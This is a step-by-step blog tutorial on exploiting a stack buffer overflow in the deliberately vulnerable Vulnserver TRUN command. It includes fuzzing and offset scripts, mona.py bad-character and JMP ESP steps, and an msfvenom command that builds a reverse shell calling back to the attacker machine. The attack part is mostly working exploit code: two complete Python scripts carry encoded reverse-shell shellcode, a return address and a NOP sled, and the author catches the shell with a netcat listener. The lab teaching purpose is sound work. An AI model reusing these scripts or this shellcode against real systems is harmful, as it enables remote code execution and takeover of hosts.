Easy Steps to Exploit Windows-Based Buffer Overflow (Vulnserver)

Raj Singh
8 min read · Nov 8, 2019

Exploiting Vulnserver with TRUN parameter

EASY STEPS

Part 1

  1. Fuzzing the TRUN command and finding the buffer length that crashes the service
  2. Generating a cyclic pattern
  3. Finding the exact offset at which EIP is overwritten

Part 2

  1. Finding bad characters with mona.py (generate a byte array, send it, compare it against memory)

Part 3

  1. Finding a return address (JMP ESP) with mona.py
  2. Setting a breakpoint to verify the return address is correct
  3. Creating a reverse shell payload with msfvenom
  4. Adding NOPs to the script
  5. Getting a shell

Exploiting VulnServer buffer overflow

In this blog we exploit Vulnserver, whose TRUN command is vulnerable to a stack-based buffer overflow (nmap labels port 9999 as "abyss"; that is only the registered name for the port, not the real service). We follow the steps listed above in order.

Tools/OS used:

  • Attacker machine: Kali Linux Rolling
  • Victim host: Windows 7 Ultimate 32-bit
  • Vulnserver application (GitHub)
  • Immunity Debugger v1.85

NOTES:

  • Attacker's IP: 10.0.0.1
  • Victim's IP: 10.0.0.36
  • Vulnerable port: 9999 (Vulnserver)
  • Vulnerable command: TRUN

Things to remember:

Attach the running application to Immunity Debugger using File > Attach > vulnserver > Attach. The process is paused after attaching, so press F9 (Debug > Run) before sending anything.

Restart the service every time you send a buffer: each crash kills the process, and the next send would find nothing listening.

To restart, use Debug > Restart, then run the application again with Debug > Run (F9).

Let's start by enumerating the target:

nmap -sCV -A -v 10.0.0.36

Starting our work

Part 1

  • Fuzzing the service's command and locating EIP

Fuzzing the service's command: in this step we check whether Vulnserver's TRUN command is vulnerable to a buffer overflow.

The Python script below uses the socket module to send TRUN followed by 3000 bytes of "A" in a single request. It is a one-shot crash test rather than an incremental fuzzer: if the process dies, the crashing length is somewhere at or below 3000 bytes, and the exact position is found in the next step.

#!/usr/bin/python
# fuzz.py -- Python 2 (byte strings). Sends one 3000-byte buffer to TRUN.
import socket

host = "10.0.0.36"
port = 9999

buffer = "A" * 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)                 # welcome banner
print "[*] Sending exploit..."
s.send("TRUN /.:/" + buffer)       # TRUN expects "/.:/" in front of the data
print s.recv(1024)
s.close()

fuzz.py

Before sending it, set a working folder in Immunity Debugger; mona writes its output files (byte arrays, comparison logs) there and we will use them later.

Using this command:

!mona config -set workingfolder c:\logs\%p

%p expands to the process name, so the files land in C:\logs\vulnserver. Now let's run the script against the target.

  • Running fuzz.py against the debugged process

As we can see, the EIP register is overwritten with 41414141 (hex for "AAAA"): our input overwrote the saved return address, so the application is vulnerable to a buffer overflow with a 3000-byte input. Where exactly within those 3000 bytes the overwrite happens is the next question.

NOTE: restart vulnserver after each crash (Debug > Restart, then Debug > Run).
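The page's fuzz.py sends a single 3000-byte buffer. The following is an added example (Python 3, not the original script) of what an incremental fuzzer for the same step looks like: it grows the buffer in fixed steps and reports the first length at which the service stops answering. The host and port are the lab values from this write-up; `simulated_trun` is a constructed stand-in for a live target so the loop can be run offline.

```python
# Incremental TRUN fuzzer (Python 3). Added example, not the page's fuzz.py.
import socket

HOST, PORT = "10.0.0.36", 9999   # assumed lab addresses from the write-up


def send_trun(data, host=HOST, port=PORT, timeout=3.0):
    """Send one TRUN request and return the service's reply (bytes).
    Raises OSError / socket.timeout once the service is gone."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                              # welcome banner
        s.sendall(b"TRUN /.:/" + data)
        return s.recv(1024)


def fuzz(probe, start=100, step=100, limit=3000):
    """Call probe(buf) with ever larger buffers of 'A'. Return the first
    length at which probe raises (service crashed or stopped answering),
    or None if `limit` is reached without a crash. `probe` is injectable
    so the loop can be exercised without a live target."""
    length = start
    while length <= limit:
        try:
            probe(b"A" * length)
        except (OSError, socket.timeout):
            return length
        length += step
    return None


def simulated_trun(max_safe=2000):
    """Constructed stand-in for a live target: answers like a TRUN handler
    and 'dies' (raises, and stays dead) once a buffer exceeds max_safe."""
    state = {"alive": True}

    def probe(buf):
        if not state["alive"] or len(buf) > max_safe:
            state["alive"] = False
            raise ConnectionResetError("service crashed")
        return b"TRUN COMPLETE\n"
    return probe


if __name__ == "__main__":
    # Against the lab box: fuzz(send_trun). Offline demo below.
    print("first crashing length:", fuzz(simulated_trun()))
```

Against the real box the crashing length reported this way is only a ceiling; the exact EIP offset still comes from the cyclic pattern in the next step.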

  • Now we generate a cyclic pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Every 4-byte window in this pattern is unique, so the 4 bytes that land in EIP identify their own position; pattern_offset.rb (also a Metasploit tool) turns that value back into the exact offset.

Now replace the contents of the buffer variable in the Python script with the pattern:

#!/usr/bin/python
# pattern.py -- Python 2 (byte strings). Sends the 3000-byte cyclic pattern
# from pattern_create.rb in place of the "A"s.
import socket

host = "10.0.0.36"
port = 9999

buffer = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
    "Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9"
    "Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9"
    "Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("TRUN /.:/" + buffer)
print s.recv(1024)
s.close()

Having replaced "A" * 3000 with the pattern, run the script again.

This time EIP holds 386F4337. Because x86 is little-endian, those 4 bytes are the ASCII string "7Co8" in the order it was sent; pattern_offset.rb does the reversal and the lookup for us:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

Things to remember: the EIP offset is 2003 (the 4 bytes at positions 2003..2006 of our input overwrite the saved return address).
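As an added example (Python 3, not the page's script or Metasploit's own code), the same cyclic-pattern scheme that pattern_create.rb and pattern_offset.rb use, reimplemented so the byte-order step is visible: the value read from EIP is reversed back into the on-the-wire string before it is looked up. The 3000-byte pattern and the 386F4337 value are the ones from this write-up.

```python
# Cyclic pattern create / offset lookup (Python 3). Added example; the
# pattern scheme is the upper-lower-digit one Metasploit's tools use.
import itertools
import struct


def pattern_create(length):
    """Return a `length`-character pattern Aa0Aa1Aa2...Az9Ba0... in which
    every 4-byte window is unique (up to 20280 characters)."""
    triples = (u + l + d
               for u in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
               for l in "abcdefghijklmnopqrstuvwxyz"
               for d in "0123456789")
    return "".join(itertools.islice(triples, length // 3 + 1))[:length]


def pattern_offset(eip_hex, length=3000):
    """eip_hex is the value shown in the EIP register, e.g. '386F4337'.
    x86 is little-endian, so the register shows the 4 bytes reversed
    relative to the order they were sent: 0x386F4337 was '7Co8' on the
    wire. Pack the value back into send order and locate it."""
    needle = struct.pack("<I", int(eip_hex, 16)).decode("ascii")
    pos = pattern_create(length).find(needle)
    return pos if pos >= 0 else None


if __name__ == "__main__":
    print(pattern_create(3000)[:30], "...", pattern_create(3000)[-9:])
    print("EIP 386F4337 -> offset", pattern_offset("386F4337"))
```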

Verifying the EIP offset and where ESP points

In this step we verify the offset found in the last step and check where ESP points after the crash, because that is where we will place the shellcode.

The script below sends 2003 "A"s, 4 "B"s and 350 "C"s (roughly the size of the msfvenom payload we will generate later). If EIP reads 42424242 (hex for "BBBB") the offset is exactly right, and the "C"s show us where ESP lands.

#!/usr/bin/python
# offset.py -- Python 2 (byte strings). 2003 "A"s reach the saved return
# address, 4 "B"s should land in EIP, 350 "C"s stand in for the shellcode.
import socket

host = "10.0.0.36"
port = 9999

buffer = "A" * 2003 + "B" * 4 + "C" * 350

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("TRUN /.:/" + buffer)
print s.recv(1024)
s.close()

Run the script and check the result in Immunity Debugger.

EIP is overwritten with 42424242 (hex for "BBBB"), so the offset of 2003 is exact.

Now check that ESP points to the start of the "C"s.

ESP points directly at the first "C", immediately after the 4 bytes that overwrote EIP, so shellcode placed there is exactly where ESP points when the function returns. That is one third of the battle against Vulnserver won.

Part 2

Finding bad characters

Bad characters: byte values that the target application or protocol does not pass through unmodified (dropped, truncated on, or transformed). If one lands inside our shellcode it corrupts it, so the shellcode must be generated without them. Which bytes are bad varies from application to application and protocol to protocol. \x00 is almost always bad where C string handling is involved, since it terminates the string, so we exclude it up front.

Generating the byte array (bad-character probe) with mona.py

!mona bytearray -b '\x00'

Mona writes the array to the working folder set earlier, C:\logs\vulnserver: bytearray.txt holds the Python string to paste into the script and bytearray.bin holds the raw bytes that mona will later compare against memory.

Copy the generated string into our script (the null byte is already excluded):

#!/usr/bin/python
# badchar.py -- Python 2 (byte strings). Sends every byte \x01..\xff right
# after the EIP overwrite so mona can compare them against memory at ESP.
import socket

host = "10.0.0.36"
port = 9999

# \x00 is left out: it terminates C strings and would cut the buffer short.
badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
           "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
           "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
           "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
           "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
           "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
           "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
           "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = "A" * 2003 + "B" * 4 + badchar

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("TRUN /.:/" + buffer)
print s.recv(1024)
s.close()

Comparing the bad-character string with mona.py

This step can take a few rounds. We send the byte array with the script from the last step, then have mona compare the bytes in memory at ESP against the file it generated. If a byte was mangled, mona reports it; we add it to the exclusion list (-b "\x00\x??" when regenerating the array), resend, and repeat until the array comes back unmodified. Only the first corrupted byte in a round is reliable, because everything after it is shifted in memory.

Run the script, then compare the memory at ESP against bytearray.bin:

!mona compare -f C:\logs\vulnserver\bytearray.bin -a 017AF9E0

Note: the ESP value can change between crashes and whenever the script changes, so read the current ESP from the registers pane after each crash and pass that address to -a.

Mona reports the status "Unmodified": every byte from \x01 to \xff arrived intact. So for TRUN the only bad character is the \x00 we excluded up front.

Things to remember: bad character = "\x00"
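The send-compare-exclude loop described above, as an added example (Python 3, not the page's script and not mona's code). `byte_array` builds the same \x01..\xff probe that `!mona bytearray -b '\x00'` produces, `first_mismatch` does the comparison `!mona compare` does, and `find_bad_chars` repeats the round until the array comes back unmodified. `simulated_probe` is a constructed stand-in for "send the buffer, read the bytes at ESP back from the debugger"; it drops \x0d to show a multi-round case, which is not how Vulnserver's TRUN behaves (the page found only \x00 there).

```python
# Bad-character rounds (Python 3). Added example; the offset is the one
# found in Part 1 of the write-up.
OFFSET = 2003


def byte_array(exclude):
    """All byte values 0x00..0xff minus the known-bad ones (mona bytearray -b)."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent, seen):
    """Index of the first byte that differs between what was sent and what
    ended up in memory, or None if `seen` starts with `sent` unchanged.
    Only the first difference is trustworthy: once a byte is dropped or
    replaced, everything behind it is shifted in the dump."""
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return i
    return None


def find_bad_chars(probe, known=(0x00,)):
    """probe(buffer) must return the bytes found on the stack after the
    crash. Each round sends the array minus the known-bad bytes, adds the
    first corrupted byte, and repeats until the array is 'Unmodified'."""
    bad = set(known)
    while True:
        arr = byte_array(bad)
        stack = probe(b"A" * OFFSET + b"B" * 4 + arr)
        i = first_mismatch(arr, stack[OFFSET + 4:])   # bytes at ESP
        if i is None:
            return sorted(bad)
        bad.add(arr[i])


def simulated_probe(buf):
    """Constructed stand-in for a live target plus debugger read-back:
    truncates at a NUL and drops \\x0d, as a line-based parser might.
    Not Vulnserver's behaviour; it only exercises the loop."""
    buf = buf.split(b"\x00")[0]
    return buf.replace(b"\x0d", b"")


if __name__ == "__main__":
    print("bad chars:", ["0x%02x" % b for b in find_bad_chars(simulated_probe)])
```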

Part 3

Finding the return address and exploitation

In this part we find a JMP ESP address to use as the return address and generate the shellcode for the final exploit.
The link below explains why we return into a JMP ESP instruction instead of hard-coding a stack address (stack addresses shift between runs and systems, while a JMP ESP in a module without ASLR stays put):
https://security.stackexchange.com/questions/157478/why-jmp-esp-instead-of-directly-jumping-into-the-stack

  • Finding a return address (JMP ESP) with mona.py

In this step we look for a JMP ESP instruction to use as the return address, so that execution is redirected to wherever ESP points (our shellcode).
Run the command below to list the modules (DLLs) the process has loaded, and pick one where Rebase, SafeSEH, ASLR and NXCompat are all False, so its addresses are stable and the memory protections do not get in the way:
!mona modules

In the module listing, essfunc.dll (Vulnserver's own helper DLL) has Rebase, SafeSEH, ASLR and NXCompat all set to False. We proceed with this module.

!mona find -s "\xff\xe4" -m essfunc.dll

\xff\xe4 is the opcode for JMP ESP (mona also offers the shortcut !mona jmp -r esp -m essfunc.dll). We find a JMP ESP in essfunc.dll at 0x625011AF. The address contains no \x00 byte, so it survives the bad-character rule.

Things to remember: JMP ESP address is 0x625011AF

Setting a breakpoint to verify the return address is correct

Type the following in the Immunity Debugger command bar:

bp 0x625011AF

and press ENTER.

You can confirm it under View > Breakpoints.

Now replace the 4 "B"s in the Python script with "\xAF\x11\x50\x62" (the address byte-reversed, because x86 stores values little-endian). The listing below already includes the NOP sled and the msfvenom shellcode from the next two steps; for a pure breakpoint test you can keep the 350 "C"s in their place.

#!/usr/bin/python
# exploit.py -- Python 2 (byte strings). Return address (little-endian),
# 20-byte NOP sled, then the msfvenom reverse shell (bad char \x00 avoided).
import socket

host = "10.0.0.36"
port = 9999

# jmp esp = 0x625011AF (essfunc.dll)
# badchar = \x00
payload = ("\xdb\xdc\xd9\x74\x24\xf4\xb8\x85\xb6\xc8\xe1\x5b\x31\xc9\xb1"
           "\x52\x83\xeb\xfc\x31\x43\x13\x03\xc6\xa5\x2a\x14\x34\x21\x28"
           "\xd7\xc4\xb2\x4d\x51\x21\x83\x4d\x05\x22\xb4\x7d\x4d\x66\x39"
           "\xf5\x03\x92\xca\x7b\x8c\x95\x7b\x31\xea\x98\x7c\x6a\xce\xbb"
           "\xfe\x71\x03\x1b\x3e\xba\x56\x5a\x07\xa7\x9b\x0e\xd0\xa3\x0e"
           "\xbe\x55\xf9\x92\x35\x25\xef\x92\xaa\xfe\x0e\xb2\x7d\x74\x49"
           "\x14\x7c\x59\xe1\x1d\x66\xbe\xcc\xd4\x1d\x74\xba\xe6\xf7\x44"
           "\x43\x44\x36\x69\xb6\x94\x7f\x4e\x29\xe3\x89\xac\xd4\xf4\x4e"
           "\xce\x02\x70\x54\x68\xc0\x22\xb0\x88\x05\xb4\x33\x86\xe2\xb2"
           "\x1b\x8b\xf5\x17\x10\xb7\x7e\x96\xf6\x31\xc4\xbd\xd2\x1a\x9e"
           "\xdc\x43\xc7\x71\xe0\x93\xa8\x2e\x44\xd8\x45\x3a\xf5\x83\x01"
           "\x8f\x34\x3b\xd2\x87\x4f\x48\xe0\x08\xe4\xc6\x48\xc0\x22\x11"
           "\xae\xfb\x93\x8d\x51\x04\xe4\x84\x95\x50\xb4\xbe\x3c\xd9\x5f"
           "\x3e\xc0\x0c\xcf\x6e\x6e\xff\xb0\xde\xce\xaf\x58\x34\xc1\x90"
           "\x79\x37\x0b\xb9\x10\xc2\xdc\xcc\xe4\xcc\x1d\xb9\xe6\xcc\x1c"
           "\x82\x6e\x2a\x74\xe4\x26\xe5\xe1\x9d\x62\x7d\x93\x62\xb9\xf8"
           "\x93\xe9\x4e\xfd\x5a\x1a\x3a\xed\x0b\xea\x71\x4f\x9d\xf5\xaf"
           "\xe7\x41\x67\x34\xf7\x0c\x94\xe3\xa0\x59\x6a\xfa\x24\x74\xd5"
           "\x54\x5a\x85\x83\x9f\xde\x52\x70\x21\xdf\x17\xcc\x05\xcf\xe1"
           "\xcd\x01\xbb\xbd\x9b\xdf\x15\x78\x72\xae\xcf\xd2\x29\x78\x87"
           "\xa3\x01\xbb\xd1\xab\x4f\x4d\x3d\x1d\x26\x08\x42\x92\xae\x9c"
           "\x3b\xce\x4e\x62\x96\x4a\x7e\x29\xba\xfb\x17\xf4\x2f\xbe\x75"
           "\x07\x9a\xfd\x83\x84\x2e\x7e\x70\x94\x5b\x7b\x3c\x12\xb0\xf1"
           "\x2d\xf7\xb6\xa6\x4e\xd2")

buffer = "A" * 2003 + "\xAF\x11\x50\x62" + "\x90" * 20 + payload

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("TRUN /.:/" + buffer)
print s.recv(1024)
s.close()

Run the script and confirm in Immunity Debugger that the breakpoint is hit (EIP = 625011AF). Then press F7 once to single-step the JMP ESP and verify that EIP now points at the start of our buffer on the stack (the "C"s, or the NOP sled if you are using the listing above).

Everything works: the script hits the breakpoint and execution is redirected into our data.

Create reverse-connection shellcode using msfvenom
In this step we generate a reverse shell payload, telling msfvenom to avoid the bad character found in Part 2, and paste the output into the script in place of the "C"s:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=443 -e x86/shikata_ga_nai -b "\x00" -f c

Adding EXITFUNC=thread to the msfvenom options makes the payload end only its own thread when the shell closes, rather than the whole process, which is the usual choice for a threaded server and saves a restart between attempts.

Adding about 20 NOPs and getting a shell

In this last step we put a NOP sled ("\x90" * 20) between the return address and the shellcode and run the final exploit against the victim to get a reverse shell. The sled is there because the shikata_ga_nai decoder stub locates its own address with an fnstenv instruction that writes onto the stack right around ESP; with the shellcode placed exactly at ESP that write can clobber the decoder's own first bytes, and a few bytes of padding keep it clear.

#!/usr/bin/python
# final.py -- Python 2 (byte strings). Same layout as above with a fresh
# shikata_ga_nai encoding of the reverse shell (10.0.0.1:443, \x00 avoided).
import socket

host = "10.0.0.36"
port = 9999

# jmp esp = 0x625011AF (essfunc.dll)
# badchar = \x00
payload = ("\xd9\xc5\xba\xc6\x09\x98\xda\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
           "\x52\x83\xe8\xfc\x31\x50\x13\x03\x96\x1a\x7a\x2f\xea\xf5\xf8"
           "\xd0\x12\x06\x9d\x59\xf7\x37\x9d\x3e\x7c\x67\x2d\x34\xd0\x84"
           "\xc6\x18\xc0\x1f\xaa\xb4\xe7\xa8\x01\xe3\xc6\x29\x39\xd7\x49"
           "\xaa\x40\x04\xa9\x93\x8a\x59\xa8\xd4\xf7\x90\xf8\x8d\x7c\x06"
           "\xec\xba\xc9\x9b\x87\xf1\xdc\x9b\x74\x41\xde\x8a\x2b\xd9\xb9"
           "\x0c\xca\x0e\xb2\x04\xd4\x53\xff\xdf\x6f\xa7\x8b\xe1\xb9\xf9"
           "\x74\x4d\x84\x35\x87\x8f\xc1\xf2\x78\xfa\x3b\x01\x04\xfd\xf8"
           "\x7b\xd2\x88\x1a\xdb\x91\x2b\xc6\xdd\x76\xad\x8d\xd2\x33\xb9"
           "\xc9\xf6\xc2\x6e\x62\x02\x4e\x91\xa4\x82\x14\xb6\x60\xce\xcf"
           "\xd7\x31\xaa\xbe\xe8\x21\x15\x1e\x4d\x2a\xb8\x4b\xfc\x71\xd5"
           "\xb8\xcd\x89\x25\xd7\x46\xfa\x17\x78\xfd\x94\x1b\xf1\xdb\x63"
           "\x5b\x28\x9b\xfb\xa2\xd3\xdc\xd2\x60\x87\x8c\x4c\x40\xa8\x46"
           "\x8c\x6d\x7d\xc8\xdc\xc1\x2e\xa9\x8c\xa1\x9e\x41\xc6\x2d\xc0"
           "\x72\xe9\xe7\x69\x18\x10\x60\x9c\xdd\x1a\x71\xc8\xdf\x1a\x70"
           "\xb3\x69\xfc\x18\xd3\x3f\x57\xb5\x4a\x1a\x23\x24\x92\xb0\x4e"
           "\x66\x18\x37\xaf\x29\xe9\x32\xa3\xde\x19\x09\x99\x49\x25\xa7"
           "\xb5\x16\xb4\x2c\x45\x50\xa5\xfa\x12\x35\x1b\xf3\xf6\xab\x02"
           "\xad\xe4\x31\xd2\x96\xac\xed\x27\x18\x2d\x63\x13\x3e\x3d\xbd"
           "\x9c\x7a\x69\x11\xcb\xd4\xc7\xd7\xa5\x96\xb1\x81\x1a\x71\x55"
           "\x57\x51\x42\x23\x58\xbc\x34\xcb\xe9\x69\x01\xf4\xc6\xfd\x85"
           "\x8d\x3a\x9e\x6a\x44\xff\xae\x20\xc4\x56\x27\xed\x9d\xea\x2a"
           "\x0e\x48\x28\x53\x8d\x78\xd1\xa0\x8d\x09\xd4\xed\x09\xe2\xa4"
           "\x7e\xfc\x04\x1a\x7e\xd5")

buffer = "A" * 2003 + "\xAF\x11\x50\x62" + "\x90" * 20 + payload

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("TRUN /.:/" + buffer)
print s.recv(1024)
s.close()

Start a listener on the attacker machine (nc -nlvp 443) and run the final script.

COWABUNGA!!! We get a shell, running with the privileges of the user who launched vulnserver (Administrator in this lab). 💣
